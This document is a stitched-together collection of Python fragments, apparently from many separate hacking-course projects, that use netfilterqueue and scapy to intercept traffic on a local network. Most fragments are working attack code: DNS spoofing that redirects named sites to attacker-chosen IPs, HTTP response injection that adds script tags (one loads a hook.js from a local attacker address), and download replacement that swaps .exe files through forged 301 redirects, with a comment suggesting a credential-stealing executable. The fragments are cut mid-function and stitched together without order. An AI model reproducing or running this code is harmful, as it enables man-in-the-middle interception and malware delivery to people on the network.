def queue(process, key): queue = netfilterqueue.NetfilterQueue() queue.bind(key, process) queue.run()
def queues(process): queue = netfilterqueue.NetfilterQueue() # creating netfilterqueue objects queue.bind(Dns.queue, process) # bind systensm queue with python queue queue.run()
def start(m): global packets global packets_listener global tcp_sessions global cb_listener global callbacks global pkt_counter global bad_sessions global global_direction global ses_counter direction = m[0] global_direction = direction n = m[1] sum = m[2] packets = m[3] tcp_sessions = m[4] cb_listener = m[5] callbacks = m[6] local_ip = m[7] pkt_counter = m[8] ses_counter = m[9] bad_sessions = list() # Logger.info("packets_" + direction + "_" + str(n)) print("!!" + direction) if direction == Constants.DIRECTION_INPUT: cmd = ("iptables -t raw -I PREROUTING -d " + local_ip + " -m statistic --mode nth --every " + str(sum) + " --packet " + str(n) + " -j NFQUEUE --queue-num " + str(n)) cmd2 = ("iptables -t raw -I PREROUTING -d " + local_ip + " -m statistic --mode nth --every " + str(sum) + " --packet " + str(n) + " -j LOG --log-prefix 'INPUT!!!NFQUEUE" + str(n) + "of" + str(sum) + ">>>' --log-level 4") Logger.info(cmd) Logger.info(cmd2) os.system(cmd) # os.system(cmd2) else: # pkt_counter = Counter("packets_" + direction + "_" + str(n), "", ['protocol', 'port', 'action']) # Logger.info("packets_" + direction + "_" + str(n)) # start_http_server(10000+n) cmd = ("iptables -t mangle -I POSTROUTING -s " + local_ip + " -m statistic --mode nth --every " + str(sum) + " --packet " + str(n) + " -j NFQUEUE --queue-num " + str(sum + n)) cmd2 = ("iptables -t mangle -I POSTROUTING -s " + local_ip + " -m statistic --mode nth --every " + str(sum) + " --packet " + str(n) + " -j LOG --log-prefix 'OUTPUT!!!NFQUEUE" + str(n) + "of" + str(sum) + ">>>' --log-level 4") Logger.info(cmd) Logger.info(cmd2) os.system(cmd) # os.system(cmd2) q = netfilterqueue.NetfilterQueue() q.bind(n if direction == Constants.DIRECTION_INPUT else n + sum, process_traffic) try: Logger.info('starting ' + ( 'input' if direction == Constants.DIRECTION_INPUT else 'output') + ' on ' + str(n)) q.run() except: Logger.info('exiting ' + ( 'input' if direction == Constants.DIRECTION_INPUT else 'output') + ' on ' + str(n)) q.unbind() clear_iptables(local_ip) sys.exit(1)
def start(self): queue = netfilterqueue.NetfilterQueue() queue.bind(0, self.process_packet) queue.run()
import netfilterqueue def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload())#wrap the payload in scapy IP layer if scapy_packet.haslayr(scapy.DNSRR): #to check if the packet is DNSrspond qname = scapy_packet[scapy.DNSQR].qname url = "Enter the dns URL " spoofIP = 'Enter the new IP of DNS/host' if url in qname: print('[+] Spoofing target Started ... ') answer = scapy.DNSRR(rrname=qname, rdate= spoofIP) scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 #this to delete the validation of the packet del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].checksum del scapy_packet[scapy.UDP].checksum del scapy_packet[scapy.UDP].len #this will set the modify packt to the packet packet.set_payload(str(scapy_packet)) packet.accept()#this method will accpet the packet then forward it. queue = netfilterqueue.NetfilterQueue() #here I create instant of netfilterqueue and place it in var queue queue.bind(0, process_packet) #this method will allows us to connect the created queue with the queue we enabled in linuxIPTables.ArithmeticError queue.run() #to run the queue
def netfilterqueue(self): queue = netfilterqueue.NetfilterQueue() queue.bind(0, self.paket_isle) queue.run()
scapy_packet[ scapy.DNS].ancount = 1 #Removing the answer count in the pkt #Removing the stuff that will cause errors in our pkt on the receiver del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum #All this will be recalculated by scapy packet.set_payload( bytes(scapy_packet)) #Setting the payload in the original pkt packet.accept() #Forwarding the payload pkt queue = netfilterqueue.NetfilterQueue() #Making our queue domain, redirection = get_arguments() try: subprocess.call([ 'sudo', 'iptables', '-I', 'FORWARD', '-j', 'NFQUEUE', '--queue-num', '0' ]) print('[*]sudo iptables -I FORWARD -j NFQUEUE --queue-num 0' ) # Putting the packets from the target in our queue 0 queue.bind(0, process_pkt) #binding the python queue to the iptable queue queue.run() except KeyboardInterrupt: print('\n[!]Flushing the iptables') subprocess.call(['sudo', 'iptables', '--flush'])
sp_packet = modify_load(sp_packet, mod_load) #print(sp_packet.show()) packet.set_payload(bytes(sp_packet)) elif sp_packet[sp.TCP].sport == 80: injection = '<script>alert("fool");\r\n</script>' print("[+] HTTP response") load = sp_packet[sp.Raw].load.decode("utf-8", "backslashreplace") load = load.replace("</body>", injection + "</body>") content_length_search = re.search( r"(?:Content-Length:\s)(\d*)", load) if content_length_search and "text/html" in load: content_length = content_length_search.group(1) new_content_length = int(content_length) + len(injection) load = load.replace(content_length, str(new_content_length)) sp_packet = modify_load(sp_packet, load) packet.set_payload(bytes(sp_packet)) print(sp_packet.show()) ''' if load != sp_packet[sp.Raw].load: sp_packet = modify_load(sp_packet, load) packet.set_payload(bytes(sp_packet)) ''' packet.accept() queue = nfq.NetfilterQueue() queue.bind(0, process) queue.run()
def main(): global targets global spoof_ip # packets go into the FORWARD chain only if they're coming from another computer. # so the line below is for when you've successfully completed an MITM attack # os.system("iptables -I FORWARD -j NFQUEUE --queue-num 0") # here we're taking all packets in the FORWARD and putting them into a queue with index no 0 # packets go into the OUTPUT chain when they're coming from your own computer. # so the line below is for when you wanna modify packets you're sending to some place os.system("iptables -I OUTPUT -j NFQUEUE --queue-num 0") os.system("iptables -I INPUT -j NFQUEUE --queue-num 0") # the first statement queues up the requests from machine to server # the second statement queues up the requests from server to machine queue = netfilterqueue.NetfilterQueue() # queuing up the packets together so that we can modify them queue.bind(0, process_packet) # This allows us to connect/bind to the queue created in the command # queue.bind(0, process_packet) # The process packet will be called and the 0 is the id of queue in the command print("[+] Default target list is") print(targets) choice = input( "\n[+] Would you like to add targets to default list [A/a] or recreate list again [R/r] or use " "default [D/d]?\n") if choice == 'A' or choice == 'a': while True: next_ele = input("[+] Enter target, or Q to quit\n") if next_ele == "Q": break else: targets.append(next_ele) elif choice == 'R' or choice == 'r': targets.clear() while True: next_ele = input("[+] Enter target, or Q to quit\n") if next_ele == "Q": break else: targets.append(next_ele) spoof_ip = input( "[+] Enter IP that you'd like to spoof to i.e. Spoofing Server IP\n") print("[+] Current target list is") print(targets) print("[+] Spoofing IP is") print(spoof_ip) try: queue.run() except KeyboardInterrupt: print("[-] Keyboard Interrupt detected, quitting...") except: print("[-] Some Error has occurred, quitting") # we even have to restore our IPtables rules back to normal os.system("iptables --flush") print("[+] IPtables restored to normal")
) #CHANGE THE VALUE OF VARIABLES rrname TO THE VALUE FOR WHICH THE DNS QUERY IS MADE AND rdata TO OUR ATTACKING MACHINE'S IP scapy_pkt[ scapy. DNS].an = answer #CHANGE THE ANSWER PART OF DNS IN THE PAYLOAD TO OUR SPOOFED PART scapy_pkt[ scapy. DNS].ancount = 1 #CHANGE THE ANSWER COUNT TO 1 INSTEAD OF MULTIPLE ANSWERS THAT ARE RETURNED #DELETE THE ACTUAL IP AND UDP len AND chksum VALUE FROM THE PAYLOAD AND SCAPY WILL AUTOMATICALLY RECALCULATE THOSE VALUES AND FOWARD THE PAYLOAD del scapy_pkt[scapy.IP].len del scapy_pkt[scapy.IP].chksum del scapy_pkt[scapy.UDP].len del scapy_pkt[scapy.UDP].chksum packet.set_payload( str(scapy_pkt )) #THIS CHANGES THE REAL PAYLOAD TO THE SPOOFED PAYLOAD packet.accept() #FORWARD THE PACKET queue = netfilterqueue.NetfilterQueue() #CREATING AN OBJECT OF NETFILTERQUEUE queue.bind( 0, process_packet ) #BINDING THE QUEUE NUMBER TO THE OBJECT AND SPECIFYING THE FUNCTION TO PERFORM THAT IS TO BE TRIGGERED queue.run() #START PROCESSING THE QUEUE #configure "#iptables -I FORWARD -j netfilter --queue-num 0" for remote machine #For local machine ##iptables -I OUTPUT -j NFQUEUE --queue-num 0 ##iptables -I INPUT -j NFQUEUE --queue-num 0
if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[ scapy.Raw].load and "3dbve_t" not in scapy_packet[ scapy.Raw].load: #3dbve_t is the name of the file tested at http://www.tucows.com/thankyou.html?swid=365586 ack_list.append(scapy_packet[scapy.TCP].ack) print("[+] .exe requested") print("[+] Intercepting File..") elif scapy_packet[scapy.TCP].sport == 10000: if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy_packet[scapy.TCP].seq) scapy_packet[ scapy. Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: http://www.tucows.com/download/windows/files4/3dbve_t.exe\n\n" print("[+]Redirecting file") del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.IP].len del scapy_packet[scapy.TCP].chksum packet.set_payload(str(scapy_packet)) packet.accept() subprocess.call( ["iptables", "-I", "OUTPUT", "-j", "NFQUEUE", "--queue-num", "0"]) subprocess.call( ["iptables", "-I", "INPUT", "-j", "NFQUEUE", "--queue-num", "0"]) packet = netfilterqueue.NetfilterQueue() packet.bind(0, file_interceptor) packet.run()
def redirect_queue(): queue = netfilterqueue.NetfilterQueue() queue.bind(0, redirect_process) queue.run()
def cut_queue(): queue = netfilterqueue.NetfilterQueue() queue.Bind(0, cut_net) queue.run()
# Removing Accept-Encoding in the request using regex rules. # The old packet will be returned as a string # Thus it will decode the response into HTML code # Source Port elif scapy_packet[scapy.TCP].sport == 10000: print("[+] Response") code_injection = '<script src="http://192.168.100.35:3000/hook.js"></script>' # Injecting HTML/JavaScript Code in the response field aka the html code of the website scapy_loader = scapy_loader.replace("</body>", code_injection + "</body>") search_content_length = regex.search("(?:Content-Length:\s)(\d*)", scapy_loader) # Checking if the search content length contains text/html i.e. in the scapy_loader if search_content_length and "text/html" in scapy_loader: content_length = search_content_length.group(1) # To pick the 2nd group in the search_content_length new_content_length = int(content_length) + len(code_injection) # To replace the content_length with new content length and assigning to scapy_loader scapy_loader = scapy_loader.replace(content_length, str(new_content_length)) # Refactoring # Checking if scapy_loader is not equal to the raw layer of the scapy packet then execute the code if scapy_loader != scapy_packet[scapy.Raw].load: new_packet = loader(scapy_packet, scapy_loader) packets.set_payload(str(new_packet)) packets.accept() # accept packets queue = netfilterqueue.NetfilterQueue() # Creating instance of netfilterqueue object queue.bind(0, spoofed_packet) # to bind with the connceted queue. The 0 represents the queue no & the process_packet is # the call back function queue.run() # to run the function # Using regex rule: (?:...). The () means to group and (?:...) means to not capture # Thus Content length is separated into two groups, the first group will not be captured # and the second group will be captured i.e. the digits that is included in the content length # On line 40 we need to put str to convert the new content length into a string
def netfilterqueue(self): queue = netfilterqueue.NetfilterQueue() queue.bind(0, self.processPacket) queue.run()
def __init__(self, evil_file_location, extention): self.extension = extention self.evil_file_location = evil_file_location self.ack_list = [] self.queue = netfilterqueue.NetfilterQueue() self.queue.bind(0, self.processed_packet)
# print(scapy_packet.show()) if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy_packet[scapy.TCP].seq) print("[+] Replacing fille") modified_packet = set_load( scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation:http://www.example.org/index.asp\n\n" ) packet.set_payload( str(modified_packet) ) #finally change payload of packet which need to be send # now run program clearing browsing history of browser # print(scapy_packet.show()) packet.accept() queue = netfilterqueue.NetfilterQueue( ) #cerate object to interact with queue number 0 as specified as command in unix sys queue.bind(0, process_packet) queue.run() # test in your own device # only use ip table ip op and download exe file from any url # rest to other device # run forward chan ip table ,become mimf ,ip forward for mimf using echo 1 >..,and from other computer clear browsing history # and download exe file from any url # can replace exe with exe file of your device ie replace with your credential harvestor(exe which send password stored on that computer to hacker computer as sms or email)
def __init__(self, parameter, payload): self.parameter = parameter self.payload = payload self.queue = netfilterqueue.NetfilterQueue() self.queue.bind(0, self.processed_packet)
def main(): queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()
def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if 'www.speedbit.com' in str(qname): # can change "" to any site you want to poison print("[+] Starting to Spoof Target: ") answer = scapy.DNSRR(rrname=qname, rdata="192.168.154.138") #rdata is the site you want to redirect to scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload(bytes(scapy_packet)) packet.accept() try: while True: print("[+] Starting ARP Spoofer waiting to intercept packets from local host... (please flush IP Tables)") queue = netfilterqueue.NetfilterQueue() #net filter q object queue.bind(0, process_packet) #callback funciton to execute on each packet queue.run() except KeyboardInterrupt: print("\n\n[x] Ending Program detected CTRL + C")
############################################################################ # #CONCEPT # # Forward the request user made to DNS Server, wait for the response # # Modify IP once the response is obtained # # # # 5H4D0W-R007 # ############################################################################ if scapy_packet.haslayer(scapy.DNSRR): #DNSResourceRecord for reponse qname = scapy_packet[scapy.DNSQR].qname #DNSQuestionRecord for request if "www.bing.com" in qname: print("[+] Spoofing target...") # Create DNSRR[response] with spoofed fields answer = scapy.DNSRR(rrname=qname, rdata="SPOOFED IP HERE") scapy_packet[scapy.DNS].an = answer #modifying the answer field scapy_packet[scapy.DNS].ancount = 1 #hardcoded to a single answer # Removing len and checksum fields for IP and UDP layer, scapy will recalculate them for spoofed packet del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len packet.set_payload( str(scapy_packet)) #set payload as modified scapy packet #print(scapy_packet.show()) packet.accept() #to forward the packet to dest queue = netfilterqueue.NetfilterQueue() # instance queue.bind(0, process_packet) # process_packet -> callback function # to connect/bind to queue0 queue.run()
del scapy_packet[scapy.IP].len ####Deletes fields that will corrupt packet so scapy can recalulate del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len packet.set_payload(str(scapy_packet)) ###Takes everything we did above and converts it back into a packer for queue packet.accept() ###forwards the modified packet! try: print("[!] Setting up network queue...") os.system("iptables -I FORWARD -j NFQUEUE --queue-num 0") print("[+] Spoofing target url >>> " + sys.argv[1] + " >>> will redirect to " + sys.argv[2]) queue = netfilterqueue.NetfilterQueue() ###creating and accessing the network queue queue.bind(0, process_packet) queue.run() except KeyboardInterrupt: print("\r[!] Restoring iptables....") os.system("iptables --flush") ###Flush the iptables upon program exit print("[-] Goodbye!") ####Create net queue #### iptables -I FORWARD -j NFQUEUE --queue-num 0 ####Reset iptables #### iptables --flush
elif scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in ack_list: # Check if the request ack number is euqal to the response seq number ack_list.remove(scapy_packet[scapy.TCP].seq) print("[+] Replacing file") # set the loaded response to HTTP 301 redirect from actual file location to specified file location scapy_packet[scapy.RAW].load = "HTTP/1.1 301 Moved Permanently\nLocation: " + options.file_url + "\n\n" # Delete the length and checksum field allowing scapy to reset del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.TCP].chksum packet.set_payload(str(scapy_packet)) # Set the modeified packet as the packet payload packet.accept() # Accept packet for forwarding try: options = get_arguments() print("[+] Modifying iptables FORWARD chain...") subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True) # create a queue rule using NFQUEUE in iptables queue = netfilterqueue.NetfilterQueue() # Create a netfilterqueue object queue.bind(0, process_packet) # Bind the queue object to the rule with queue number 0 and the callback function queue.run() # Send the queued packets to the callback function except KeyboardInterrupt: print("\n[+] Resetting iptables FORWARD chain...") subprocess.call("iptables -D FORWARD -j NFQUEUE --queue-num 0", shell=True) # delete the queue rule in iptables
print("Starting Code Injector") print("===================") packet_origin = get_args() #enable packet routing of Kali machine subprocess.run(["echo", "1", ">", "/proc/sys/net/ipv4/ip_forward"]) if packet_origin == "remote": subprocess.call( ["iptables", "-I", "FORWARD", "-j", "NFQUEUE", "--queue-num", "666"]) elif packet_origin == "own": subprocess.call( ["iptables", "-I", "OUTPUT", "-j", "NFQUEUE", "--queue-num", "666"]) subprocess.call( ["iptables", "-I", "INPUT", "-j", "NFQUEUE", "--queue-num", "666"]) try: queue = netfilterqueue.NetfilterQueue( ) # object that is going to interact with queue 666 created above queue.bind( 666, process_packet ) # binds variable 'queue' to 666 and executes a function on every packet in the queue queue.run() except KeyboardInterrupt: print("Shutting down program...") print("Flushing IP Tables...") subprocess.run(["iptables", "--flush"]) subprocess.run(["echo", "0", ">", "/proc/sys/net/ipv4/ip_forward"]) print("IP Tables successfully reset.") exit()
def process_queue(): queue = netfilterqueue.NetfilterQueue( ) # Creating an Instance of NetFilterQueue. queue.bind(0, process_packets ) # Binding the instance to the '0' Queue-num in Iptables rule. queue.run()
# craft a fake DNS response. rrname is the website name, rdata is the fake IP of www.udemy.com. # The rest of the fields are automatically filled by scapy answer = scapy.DNSRR(rrname=qname, rdata="172.217.26.68") # replace actual DNS answer with fake one scapy_packet[scapy.DNS].an = answer # reset number of DNS answers in the packet to 1. Initially there were others but we are only creating 1 scapy_packet[scapy.DNS].ancount = 1 # delete len and chksum fields from the IP and UDP layer as these will be wrong. # Scapy will automatically recalculate the values based on the fields that were modified. del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload( str(scapy_packet )) # convert the scapy packet back to the original packet packet.accept() queue = netfilterqueue.NetfilterQueue() # create a NF queue object # binds queue to the queue created in the terminal (with queue-num = 0) with the above command. # process_packet is the call back function to execute each time a packet comes in queue.bind(0, process_packet) queue.run()
del scapy_packet[scapy.TCP].chksum try: def FunyBunny(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP]: if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[scapy.Raw].load: print(".exe Request") acq_list.append(scapy_packet[scapy.TCP].ack) if scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in acq_list: print("[+]ReplacingFile") modi = set_load( scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: https://www.win-rar.com/postdownload.html?&L=0\n\n" ) packet.set_payload(str(scapy_packet)) packet.accept() queue = net.NetfilterQueue() queue.bind(2, FunyBunny) queue.run() except KeyboardInterrupt: print("[-] Quitting... Detected Ctrl + C") subprocess.call("sudo iptables --flush ", shell=True)
def __init__(self, target_address, spoofed_address): self.target_address = target_address self.spoofed_address = spoofed_address self.queue = netfilterqueue.NetfilterQueue() self.queue.bind(0, self.process_packet)
scapy_packet[scapy.DNS].an = response scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum print(scapy_packet.show()) packet.set_payload(str(scapy_packet)) print("VA A ACEPTAR EL PACKET") packet.accept() print("HA ACEPTADO EL PACKET") else: packet.accept() try: # create the queue at the system create_queue("0") # create an instance of netfilterqueue object queue = netfilterqueue.NetfilterQueue() # connect this object with queue created in our system # set the process_packet as callback function queue.bind(0, process_packet) queue.run() except KeyboardInterrupt: print("\n[-] Detected CTRL + C, restoring IP tables.") # to restore the ip tables: iptables -- flush subprocess.call(["iptables", "--flush"])
options = get_arguments() target_website = options.target # globally set modified_ip = options.ip # globally set queue_num = options.queue_num if int(options.preference): # To run this as man in the middle # !! DISCLAIMER: This app doesn't create a man in the middle, you need an arp spoofer running !! subprocess.run([ "iptables", "-I", "FORWARD", "-j", "NFQUEUE", "--queue-num", queue_num ]) else: # To run this locally subprocess.run([ "iptables", "-I", "OUTPUT", "-j", "NFQUEUE", "--queue-num", queue_num ]) subprocess.run( ["iptables", "-I", "INPUT", "-j", "NFQUEUE", "--queue-num", queue_num]) queue = netfilterqueue.NetfilterQueue() # object creation queue.bind(int(queue_num), process_packet) # connect to an existed queue try: queue.run() except KeyboardInterrupt: print("\n[!] Detected CTRL + C ... FlUSHING IPTABLES...") subprocess.run(["iptables", "--flush"]) print("[+] Done.")